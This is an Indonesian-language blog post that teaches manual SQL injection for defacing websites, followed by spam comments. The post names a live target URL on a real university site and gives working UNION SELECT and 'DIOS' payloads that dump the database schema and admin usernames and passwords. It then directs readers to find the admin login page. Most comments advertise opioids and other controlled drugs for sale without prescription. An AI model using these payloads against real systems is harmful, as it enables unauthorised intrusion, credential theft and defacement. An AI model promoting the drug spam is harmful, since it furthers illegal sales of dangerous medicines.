Deface Metode SQL Injection Manual with Dios

Thursday, June 28, 2018 5 Comments Edit
Assalamualaikum w.r w.b
Bertemu lagi dengan saya
Kali ini saya akan memberikan tutorial SQL Injection Manual

Oke.... disimak ya hehe

Bahan - Bahan
1. Internet cuy yakali kaga pake internet
2. Dork *kalian bisa cek dork disini > Dork SQL injection
3. Web yg vuln sql injection
    *disini saya ada live target : http://dme.im.ufrj.br/visualizarNoticia.php?id=25
- Sekarang kita tambahkan ' (single quote)
 jadinya seperti ini : http://dme.im.ufrj.br/visualizarNoticia.php?id=25'
- Dan disini kita menemukan error atau ada gambar yg hilang.
*seperti ini:
- Lalu kita disini melakukan perintah +order+by+1--+
- Contoh : http://dme.im.ufrj.br/visualizarNoticia.php?id=25+order+by+1--+

- Lakukan order by hingga menemukan error lagi seperti ini saya menemukan error di angka 4.
- Berarti kita hanya ambil sampai 3 saja karena error nya di 4.
- Selanjutnya kita melakukan perintah +union+select+ dan menambahkan - sebelum angka
- Jadinya seperti ini : http://dme.im.ufrj.br/visualizarNoticia.php?id=-25+union+select+1,2,3--+
- Dan disini muncul angka togel yaitu 1,2 dan 3.
- Agar tidak lama untuk mencari database, table dan column kita menggunakan dios saja
- Masukan dios ini di angka togel
 Dios : 
 /*!00000/*!00000(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,database(),0x3a3a,table_name,0x203a3a20,column_name))))x)*/
- Dan disini langsung keluar database table dan column nya.
 Note : Bila kalian tidak tahu mana database, table dan mana column saya akan memberitahu kalian, jadi yang paling kiri itu database, yang tengah namanya table, dan yang  paling kanan itu namanya column
- Selanjutnya kita tinggal ambil user / password admin.
- Dengan cara memasukan dios berikut
Dios : 
 (/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(namatable)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,namacolum,0x203a3a20,namacolum))))x)
- Bisa dibilang seperti ini :
 http://dme.im.ufrj.br/visualizarNoticia.php?id=-25+union+select+1,(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(usuario)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,strLogin,0x203a3a20,strSenha))))x),3--+
 *kalian harus sesuaikan nama table dan colum nya ya..

- Dan sekarang kita sudah mendapatkan user dan password admin nya.
- Sekarang tinggal kalian cari saja halaman admin nya biasanya di
 *  -/admin
     -/administrator
     -/login.php
     -/admin.php
- Jika belum ketemu juga kalian bisa download dirbuster Disini, atau memakai admin finder online.

Oke mungkin cukup sekian tutorial kali ini semoga bermanfaat.
See you on the next tutorial...

5 Responses to "Deface Metode SQL Injection Manual with Dios"

  1. AzlanMay 18, 2020 at 6:15 AM

    Grimy fuel injectors causes blocking which prompts an enormous assortment of motor issues.injector cleaner

    ReplyDelete
  2. ROBINSONJanuary 11, 2021 at 12:41 PM

    ttp://www.greenarobinson.com/

    greenarobinson.com
    best place to buy vicodin online
    buy Activan online
    buy xanax online without prescription
    buy adderall online
    best place to buy clonazepam powdwer
    best place to buy percocet online
    best place to buy hydrocodone online
    best place to buy Lortab online
    buy oxycodone online
    buy oxycondin online
    best place to buy tramadol online
    Tel: +1(510)519-4336

    ReplyDelete
  3. christopher smithJanuary 17, 2021 at 2:56 AM

    best place to buy hydrocodone online buy oxycodone online buy painkillers onlone without prescription at http://www.silverlinepharmacy.com/shop

    ReplyDelete
  4. christopher smithJanuary 17, 2021 at 2:56 AM

    best place to buy hydrocodone online buy oxycodone online buy painkillers onlone without prescription at http://www.silverlinepharmacy.com/shop

    ReplyDelete
  5. UnknownJanuary 19, 2021 at 5:26 AM

    Welome to millinium online pharmacy Purchase Dexedrine Online Without Prescription Legit in a Legal Way.
    Dexedrine is a drug used to treat Attention Deficit Hyper-innovativeness Disorder (ADHD). It changes the measure of certain common substances in the cerebrum. Dextroamphetamine likewise has a place with a class of medications known as energizers. it encourages increment your capacity to remain concentrated on a movement, focus improves ones listening aptitudes. More to that this medicine is likewise used to treat some dozing issue (narcolepsy) which encourages you remain conscious during the day. anyway it ought to be utilized to hold off rest or to treat tiredness in those that don’t have a rest issue. Purchase Dexedrine Online Here Without Prescription.

    Best Place to Buy Dexedrine Online Without Prescription–Dexedrine available to be purchased Here Safely and Legit Buy ADHD Medication Online
    Here, you can securely and safely purchase Dexedrine online without remedy. Our Products are of the best quality from FDA Approved offices. Bundling is sheltered and sending is 100% attentive and conveyance is quick. We transport with different expedited delivery conveyance administrations like DHL, FedEx, EMS…
    www.milliniumpharmacy.com

    ReplyDelete

Subscribe to: Post Comments (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel